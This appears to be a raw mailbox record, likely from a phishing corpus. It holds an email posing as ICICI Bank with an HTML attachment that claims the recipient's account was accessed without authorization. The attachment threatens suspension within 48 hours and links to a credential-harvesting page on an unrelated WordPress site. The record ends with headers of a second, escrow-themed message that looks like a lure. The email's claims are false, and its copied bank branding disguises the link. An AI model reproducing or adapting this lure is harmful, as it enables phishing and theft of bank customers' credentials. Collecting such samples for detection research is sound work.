From: icici bank<info@fidrec.com.sg>
Date: Sat, 11 Aug 2018 15:30:24 +0000
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 550

You will not see this in a MIME-aware mail reader.
--===============1612156070==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear Valued Customer,

To enroll your account, Please view the attached file


If you have questions, Just call the PhoneBanking number in your Location.

Thank you for banking with us.

Sincerely,
Online services.
--===============1612156070==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="icicbk.htm"

<div id=3D"yui_3_16_0_1_1430870246257_43849" class=3D"thread-body" role=3D"=
presentation">  <div id=3D"yui_3_16_0_1_1430870246257_43848" class=3D"body =
undoreset" role=3D"gridcell" tabindex=3D"0"><div id=3D"yui_3_16_0_1_1430870=
246257_43847" class=3D"email-wrapped"><div id=3D"yiv6305961299">
<title></title> =

<div id=3D"yui_3_16_0_1_1430870246257_43846"><table id=3D"yui_3_16_0_1_1430=
870246257_43845" style=3D"table-layout:fixed;color:black;background:none;pa=
dding:0;border-spacing:0;border:none;border-collapse:collapse;background-co=
lor:white;" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"511px=
"><tbody id=3D"yui_3_16_0_1_1430870246257_43844"><tr style=3D"min-height:0p=
x;padding:0;margin:0;border:none;"><td style=3D"width:57px;padding:0;margin=
:0;border:none;"></td><td style=3D"width:454px;padding:0;margin:0;border:no=
ne;"></td></tr><tr id=3D"yui_3_16_0_1_1430870246257_43973" style=3D"padding=
:0;margin:0;border:none;" height=3D"19px"><td id=3D"yui_3_16_0_1_1430870246=
257_43972" colspan=3D"2" style=3D"margin:0;border:none;padding:0;border-spa=
cing:0;">&nbsp;</td></tr><tr id=3D"yui_3_16_0_1_1430870246257_43843" style=
=3D"padding:0;margin:0;border:none;" height=3D"10px"><td id=3D"yui_3_16_0_1=
_1430870246257_43971" style=3D"margin:0;border:none;padding:0;border-spacin=
g:0;">&nbsp;</td><td id=3D"yui_3_16_0_1_1430870246257_43842">   <div id=3D"=
yui_3_16_0_1_1430870246257_43841">  <table id=3D"yiv6305961299backgroundTab=
le" bgcolor=3D"#ffffff" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"100%">   <tbody id=3D"yui_3_16_0_1_1430870246257_44004">      <tr id=
=3D"yui_3_16_0_1_1430870246257_44003">         <td id=3D"yui_3_16_0_1_14308=
70246257_44002">            <table id=3D"yui_3_16_0_1_1430870246257_44001" =
class=3D"yiv6305961299devicewidth" style=3D"border-left:1px solid #b02832;b=
order-right:1px solid #b02832;" align=3D"center" border=3D"0" cellpadding=
=3D"0" cellspacing=3D"0" width=3D"651">               <tbody id=3D"yui_3_16=
_0_1_1430870246257_44000">                  <tr id=3D"yui_3_16_0_1_14308702=
46257_43999">                     <td id=3D"yui_3_16_0_1_1430870246257_4399=
8" width=3D"100%">                        <table id=3D"yui_3_16_0_1_1430870=
246257_43997" class=3D"yiv6305961299devicewidth" align=3D"center" border=3D=
"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"651">                     =
      <tbody id=3D"yui_3_16_0_1_1430870246257_43996">                      =
                                      <tr id=3D"yui_3_16_0_1_1430870246257_=
43995">                                 <td id=3D"yui_3_16_0_1_143087024625=
7_43994" bgcolor=3D"#af2930" height=3D"10"><img height=3D"10" width=3D"5"><=
/td>                              </tr>                                    =
                                                   </tbody>                =
        </table>                     </td>                  </tr>          =
     </tbody>            </table>         </td>      </tr>   </tbody></tabl=
e>      <table id=3D"yiv6305961299backgroundTable" bgcolor=3D"#ffffff" bord=
er=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">   <tbody id=3D=
"yui_3_16_0_1_1430870246257_43967">      <tr id=3D"yui_3_16_0_1_14308702462=
57_43966">         <td id=3D"yui_3_16_0_1_1430870246257_43965">            =
<table id=3D"yui_3_16_0_1_1430870246257_43964" class=3D"yiv6305961299device=
width" style=3D"border-left:1px solid #b02832;border-right:1px solid #b0283=
2;" align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"651">               <tbody id=3D"yui_3_16_0_1_1430870246257_43963">    =
              <tr id=3D"yui_3_16_0_1_1430870246257_43962">                 =
    <td id=3D"yui_3_16_0_1_1430870246257_43961" width=3D"100%">            =
            <table id=3D"yui_3_16_0_1_1430870246257_43960" class=3D"yiv6305=
961299devicewidth" align=3D"center" bgcolor=3D"#ffffff" border=3D"0" cellpa=
dding=3D"0" cellspacing=3D"0" width=3D"651">                           <tbo=
dy id=3D"yui_3_16_0_1_1430870246257_43959">                                =
                            <tr>                                 <td style=
=3D"font-size:1px;line-height:1px;" height=3D"10">&nbsp;</td>              =
                </tr>                                                      =
      <tr id=3D"yui_3_16_0_1_1430870246257_43970">                         =
       <td id=3D"yui_3_16_0_1_1430870246257_43969" align=3D"right" valign=
=3D"top">                                <div id=3D"yui_3_16_0_1_1430870246=
257_43968" class=3D"yiv6305961299imgpop">                                <i=
mg title-off=3D"" src=3D"http://www.icicibank.com//campaigns/estatements/im=
ages/logo.png" alt=3D"ICICI Bank" title=3D"ICICI Bank" class=3D"yiv63059612=
99respon" height=3D"65" width=3D"350"></div></td>                          =
    </tr>                                                            <tr id=
=3D"yui_3_16_0_1_1430870246257_43958">                                 <td =
id=3D"yui_3_16_0_1_1430870246257_43957" style=3D"font-size:1px;line-height:=
1px;border-bottom:1px #b02a30 solid;" height=3D"10">&nbsp;</td>            =
                  </tr>                                                    =
     </tbody>                        </table>                     </td>    =
              </tr>               </tbody>            </table>         </td=
>      </tr>   </tbody></table>       <table id=3D"yiv6305961299backgroundT=
able" bgcolor=3D"#ffffff" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" =
width=3D"100%">      <tbody>         <tr>            <td>               <ta=
ble class=3D"yiv6305961299devicewidth" style=3D"border-left:1px solid #b028=
32;border-right:1px solid #b02832;" align=3D"center" bgcolor=3D"#ffffff" bo=
rder=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"651">              =
    <tbody>                                                           </tbo=
dy>               </table>            </td>         </tr>      </tbody>   <=
/table>    <table id=3D"yiv6305961299backgroundTable" bgcolor=3D"#ffffff" b=
order=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100%">   <tbody id=
=3D"yui_3_16_0_1_1430870246257_43840">      <tr id=3D"yui_3_16_0_1_14308702=
46257_43839">         <td id=3D"yui_3_16_0_1_1430870246257_43838">         =
   <table id=3D"yui_3_16_0_1_1430870246257_43837" class=3D"yiv6305961299dev=
icewidth" style=3D"border-left:1px solid #b02832;border-right:1px solid #b0=
2832;" align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"651">               <tbody id=3D"yui_3_16_0_1_1430870246257_43836"> =
                 <tr id=3D"yui_3_16_0_1_1430870246257_43835">              =
       <td id=3D"yui_3_16_0_1_1430870246257_43834" width=3D"100%">         =
               <table id=3D"yui_3_16_0_1_1430870246257_43833" class=3D"yiv6=
305961299devicewidth" align=3D"center" bgcolor=3D"#ffffff" border=3D"0" cel=
lpadding=3D"0" cellspacing=3D"0" width=3D"651">                           <=
tbody id=3D"yui_3_16_0_1_1430870246257_43832">                             =
                                                             <tr id=3D"yui_=
3_16_0_1_1430870246257_43831">                                 <td id=3D"yu=
i_3_16_0_1_1430870246257_43830">                                    <table =
id=3D"yui_3_16_0_1_1430870246257_43829" class=3D"yiv6305961299devicewidthin=
ner" align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" widt=
h=3D"558">                                       <tbody id=3D"yui_3_16_0_1_=
1430870246257_43828">                                          <tr id=3D"yu=
i_3_16_0_1_1430870246257_43827">                                           =
  <td id=3D"yui_3_16_0_1_1430870246257_43826" width=3D"100%">              =
                               		<table id=3D"yui_3_16_0_1_1430870246257_43=
825" class=3D"yiv6305961299devicewidth" align=3D"left" bgcolor=3D"#ffffff" =
border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"560">            =
               <tbody id=3D"yui_3_16_0_1_1430870246257_43824">             =
                                                                           =
  <tr id=3D"yui_3_16_0_1_1430870246257_43823">                             =
    <td id=3D"yui_3_16_0_1_1430870246257_43822">                           =
         <br><br>Thank you for banking with us.<p></p><table id=3D"yui_3_16=
_0_1_1430870246257_43821" class=3D"yiv6305961299devicewidth" align=3D"cente=
r" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"520">         =
                              <tbody id=3D"yui_3_16_0_1_1430870246257_43820=
">                                          <tr id=3D"yui_3_16_0_1_14308702=
46257_43819">                                             <td id=3D"yui_3_1=
6_0_1_1430870246257_43818">                                                =
                                                                           =
                                                                     <table=
 id=3D"yui_3_16_0_1_1430870246257_43817" class=3D"yiv6305961299devicewidthm=
ob" align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"550">                                                   <tbody id=3D"yu=
i_3_16_0_1_1430870246257_43816">                                           =
                                                                           =
                                                                           =
                                                                           =
 <tr id=3D"yui_3_16_0_1_1430870246257_43815">                              =
                          <td id=3D"yui_3_16_0_1_1430870246257_43814" style=
=3D"font-family:Arial;font-size:14px;color:#000;text-align:justify;line-hei=
ght:18px;" class=3D"yiv6305961299padding-right15">                         =
                                                                           =
           <br>                                                       Dear =
Customer,<span style=3D"border-bottom: 1px dashed rgb(0, 102, 204); backgro=
und: transparent none repeat scroll 0% 0%; -moz-background-clip: -moz-initi=
al; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -m=
oz-initial; cursor: pointer;" class=3D"yshortcuts" id=3D"lw_1224194786_0"><=
span style=3D"border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;"=
 class=3D"yshortcuts" id=3D"lw_1224889710_0"><span style=3D"border-bottom: =
1px dashed rgb(0, 102, 204); cursor: pointer;" class=3D"yshortcuts" id=3D"l=
w_1226480345_0"><span class=3D"yshortcuts" id=3D"lw_1227319190_0"><span cla=
ss=3D"yshortcuts" id=3D"lw_1228857690_0"><span style=3D"border-bottom: 1px =
dashed rgb(0, 102, 204); cursor: pointer;" class=3D"yshortcuts" id=3D"lw_12=
28945424_0"><span class=3D"yshortcuts" id=3D"lw_1231453622_0"></span></span=
></span></span></span></span></span><br><br>
We recently reviewed your account and it was suspected that your ICICI Bank=
 account<br> =

may have been accessed from an unauthorized computer. This may be due to ch=
anges in  =

your IP address or location. <br><br>Your account will be disable within 48=
 hours if you fail to update your details by clicking <br> on the below lin=
k. <br><br>Protecting the security of your account and ICICI Bank network i=
s our primary concern<br> and that is why your account will be put on HOLD =
.<br><br>

<a rel=3D"nofollow" target=3D"_blank" href=3D"http://alshair.org/wp-include=
s/SimplePie/icici/info.htm"><span class=3D"yshortcuts" style=3D"color:#b02a=
30;id=3D" lw_1224194786_1"=3D"">CLICK HERE TO UPDATE</span></a><p></p>
<p align=3D"left"><weak><br>Important Notice:- <br><br>Add <a rel=3D"nofoll=
ow" ymailto=3D"mailto:estatement@icicibank.com" target=3D"_blank" href=3D"m=
ailto:estatement@icicibank.com" style=3D"color:#b02a30;">customercare@icici=
bank.com </a>to your white list / safe sender list by <a rel=3D"nofollow" t=
arget=3D"_blank" href=3D"http://www.icicibank.com/campaigns/estatements/Dis=
claimer_clickHere.html" style=3D"color:#b02a30;">clicking here</a>. Else, y=
our mailbox filter or ISP (Internet Service Provider) may stop you from rec=
eiving your e-mail account statement</weak></p></td>  </tr>  </tbody></tabl=
e></td>                                                      </tr>         =
                                             <tr>                          =
                              <td align=3D"center" valign=3D"middle"></td> =
                                                    </tr>                  =
                                                                           =
     </tbody></table></td>                                                 =
     </tr>                                                      <tr>       =
                                                 <td align=3D"center" valig=
n=3D"middle"></td>                                                     </tr=
>                                                                          =
                                                                           =
                                                                           =
                                                                           =
                                                                           =
                                                       <tr>                =
                                         <td height=3D"30" width=3D"100%"><=
/td>                                                     </tr>             =
                                         <tr id=3D"yui_3_16_0_1_14308702462=
57_43935">                                                         <td id=
=3D"yui_3_16_0_1_1430870246257_43934" style=3D"font-family:Arial;font-size:=
14px;color:#231F20;text-align:left;line-height:18px;" align=3D"left" valign=
=3D"top">Sincerely,                                                        =
   <br>                                                                    =
                                                  <img title-off=3D"" id=3D=
"yui_3_16_0_1_1430870246257_43956" src=3D"http://www.icicibank.com/campaign=
s/estatements/images/aanchal_sig.jpg" alt=3D"Aanchal Kapoor" title=3D"Aanch=
al Kapoor" style=3D"margin-top:10px;margin-bottom:10px;" height=3D"41" widt=
h=3D"160">                                                           <p><st=
rong>Aanchal Kapoor</strong><br>                                           =
             Head - Privilege Banking<br>                                  =
                      <br>                                                 =
       </p><table id=3D"yui_3_16_0_1_1430870246257_44069" border=3D"0" cell=
padding=3D"0" cellspacing=3D"0" width=3D"100%">  <tbody id=3D"yui_3_16_0_1_=
1430870246257_44068"><tr id=3D"yui_3_16_0_1_1430870246257_44067">    <td wi=
dth=3D"10%"><img src=3D"http://www.icicibank.com/campaigns/estatements/imag=
es/safe-banking1.jpg" alt=3D"safe-banking" height=3D"49" width=3D"49"></td>=
    <td id=3D"yui_3_16_0_1_1430870246257_44066" style=3D"font-family:Arial;=
font-size:14px;color:#231F20;text-align:left;line-height:18px;" width=3D"90=
%"> 	<strong id=3D"yui_3_16_0_1_1430870246257_44070">Protect your PIN by st=
anding close to the ATM and shielding or cover the key pad with your other =
hand when entering your PIN.</strong></td>  </tr></tbody></table>          =
                                              <p></p></td>                 =
                                     </tr>                                 =
                                                                           =
                                                                           =
                              </tbody></table></td></tr></tbody></table></t=
d></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>=
</div></td></tr></tbody></table></div></div></div></div></div>
--===============1612156070==--

From jose@monkey.org Mon Aug 13 21:41:52 2018 +0000
Return-Path: 3wc@rice.edu
Delivered-To: jose@monkey.org
X-FDA: 74494215264.11.fifth33_4a973139e4148
X-Spam-Summary: 50,0,0,6207359f4013188c,d41d8cd98f00b204,3wc@rice.edu,:3wc@rice.edu,RULES_HIT:41:72:355:379:474:559:962:967:973:978:983:988:989:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1534:1542:1568:1571:1575:1588:1592:1594:1685:1711:1714:1730:1776:1792:2198:2199:2525:2553:2557:2560:2564:2682:2685:2859:2894:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3865:3866:3867:3868:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4310:4321:5007:6248:6261:6669:6687:6688:7901:7903:8513:8568:8599:8603:8885:8957:9025:9059:9388:9411:9908:10004:10049:10214:10346:10400:10459:11537:11657:11658:11914:12043:12075:12217:12438:12555:12561:12776:12812:12986:13095:13139:13237:13439:13628:14093:14094:14096:14181:14346:14515:14651:14721:14849:21080:21162:21433:21451:21524:21611:21627:21790:30014:30022:30026:30054:30055:30070:30083:30090,0,RBL:69.95.226.15:@rice.edu:.lbl8.mailshell.net-62.16.0.100 66.201.201.201,CacheIP:none,Bayesian:0.
X-HE-Tag: fifth33_4a973139e4148
X-Filterd-Recvd-Size: 4836
Received: from smtp005.earthlinkbusiness.com (smtp005.earthlinkbusiness.com [69.95.226.15])
	by imf03.b.hostedemail.com (Postfix) with SMTP
	for <jose@monkey.org>; Mon, 13 Aug 2018 21:41:52 +0000 (UTC)
Received: (qmail 13893 invoked from network); 13 Aug 2018 21:31:06 -0000
Received: from unknown (HELO mail87c25.carrierzone.com) (64.29.147.157)
  by smtp005.earthlinkbusiness.com with SMTP; 13 Aug 2018 21:31:06 -0000
Received: from SIHts01.tidaltank.com (static-199-182-80-74.earthlinkbusiness.net [199.182.80.74])
	by mail87c25.carrierzone.com (8.14.9/8.13.1) with ESMTP id w7DLHwQX014447;
	Mon, 13 Aug 2018 17:30:52 -0400
Message-Id: <201808132130.w7DLHwQX014447@mail87c25.carrierzone.com>
Content-Type: multipart/alternative; boundary="===============1688900357=="
MIME-Version: 1.0
Subject: REVIEW CORRECTLY FINAL CD FOR ESCROW & AGENT FEES    FILE NO: 0007580
To: Recipients <3wc@rice.edu>
